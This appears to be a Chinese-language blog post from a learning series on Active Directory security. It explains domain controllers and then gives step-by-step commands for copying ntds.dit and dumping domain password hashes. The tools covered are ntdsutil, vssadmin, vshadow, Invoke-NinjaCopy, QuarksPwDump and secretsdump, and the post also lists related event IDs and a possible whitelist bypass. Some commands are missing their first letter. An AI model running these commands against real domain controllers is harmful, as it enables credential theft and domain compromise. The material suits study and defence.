iT邦幫忙

2022 iThome 鐵人賽

DAY 27
1
Security

資安這條路:學習 Active Directory Security系列 第 27

AD Security - [Day27] 一起來學 AD 安全吧!: Domain Controlloer 中 ntds.dit 攻擊手法

  • 分享至 

  • xImage
  •  

「打給賀,挖西飛飛,今天你要來點 Active Directory Security 嗎?」

Computers

  • 三種類型
    • Domain Controller:管理 Domain 的中央伺服器
    • Workstation:員工的個人電腦
    • Server:架設網站、系統、資料庫的電腦

Domain Controllers

  • 執行 Active Directory Domain Service 的伺服器
  • 提供 AD 服務
    • 身份認證
    • 權限授權
    • domain 名解析
  • 負責儲存 domain 資料庫的資訊
    • 儲存位置:C:\windows\ntds\ntds.dit
      • 能存取 Domain、User、Group、GPO
      • 包含密碼 Hash Value
    • 駭客的攻擊目標
    • 保護:應只有管理員能查看
  • 一個 domain 可能有多個 Domain Controllers
  • 提供其他服務
    • DNS、Kerberos、LDAP、SMB、RPC

ntds.dit 攻擊手法

  1. Volume Shadow Copy 磁碟區陰影複製服務
    • 用來製作快照的工具,domain 環境預設有安裝
    • 禁止該工具會影響作業系統使用
      • System Restore
      • Windows Server Backup
    • 使用該工具會有event ID:7036
    • 使用方法
      • (1) 查詢目前作業系統的快照
      tdsutil snapshot "List All" quit quit
      tdsutil snapshot "List Mounted" quit quit
      ``
       (2) 建立快照(會取得 GUID)
      - 會有 EventID 98
      ``
      tdsutil snapshot "activate instance ntds" create quit quit
      ``
       (3) 掛載(mount)快照(需使用第二步驟取得的GUID)
      - 會取得快照掛載的路徑如 `C:\$SNAP_202210121012_VOLUMEC$\`
      ``
      tdsutil snapshot "mount {GUID}" quit quit
      ``
       (4) 複製 ntds.dit
      ``
      opy C:\$SNAP_202210121012_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
      ``
       (5) 卸載(unmount)快照
      ``
      tdsutil snapshot  "unmount {GUID}" quit quit
      ``
       (6) 刪除快照
      ``
      tdsutil snapshot  "delete {GUID}" quit quit
      ``
      
  2. vssadmin
    • Windows 內建工具
    • 顯示目前硬碟下的快照備份以及與安裝的快照
    • 基礎指令
      • vssadmin list shadows: 列出硬碟中的快照
      • vssadmin list writers: 列出已訂閱的寫入器
    • 步驟
      • (1) 查詢目前的快照
        • vssadmin list shadows
      • (2) 新增快照
        • vssadmin create shadow /for=c:
        • 會取得快照路徑
      • (3) 複製 ntds.dit
        • copy \\?\快照路徑\windows\NTDS\ntds.dit c:\ntds.dit
      • (4) 刪除快照
        • vssadmin delete shadows /for=c: /quiet
  3. vshadow.exe
  • 非內建的指令工具,可以建立與管理快照
  • 步驟
    • (1) 查詢目前的快照
      • vshadow.exe -q
    • (2) 新增快照
      • vshadow.exe -p -nw C:
      • 會取得
        • SnapshotSetID
        • SnapshotID
        • Shadow copy device name
    • (3) 複製 ntds.dit
      • copy Shadow copy device name\windows\NTDS\ntds.dit c:\ntds.dit
    • (4) 刪除快照
      • vshadow -dx={SnapshotSetID}
      • vshadow -ds={SnapshotID}
  • 其他應用,執行指令
    • vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:
      • 執行後會背景會有 VSSVC.exe
      • 顯示 Volume Shadow Copy 正在執行
      • 關閉 VSSVC.exe 會有 eventID 7034
    • 可能可以繞過白名單限制(因為有微軟的數位簽章)
  1. NinjaCopy
    • PowerSploit 工具
    • 使用
    Import-Module .\invoke-NinjaCopy.ps1
    Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
    Invoke-NinjaCopy -Path   C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
    Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"
    
  2. QuarksPwDump
    • Dump Windows 使用者憑證
      • local user
      • domain user
      • cache user
      • Bitlocker
    • ntds.dit 若損毀
      • 使用 esentutl 修復
        • 伺服器資料庫儲存工具,可用來修復損毀的資料庫
      • esentutl /p /o ntds.dit
    • 指令,匯出敏感資料
      • QuarksPwDump.exe --dump-hash-domain --output password.txt --ntds-file c:\ntds.dit
  3. secretsdump
    • 速度較慢
    • 指令
    secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
    secretsdump.exe -system system.hive -ntds ntds.dit LOCAL
    

參考資料


上一篇
AD Security - [Day26] 一起來學 AD 安全吧!: Protected Users、Account Operators 與 DCSync 攻擊手法初探
下一篇
AD Security - [Day28] 一起來學 AD 安全吧!: 如何找到 Domain Controllers
系列文
資安這條路:學習 Active Directory Security33
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言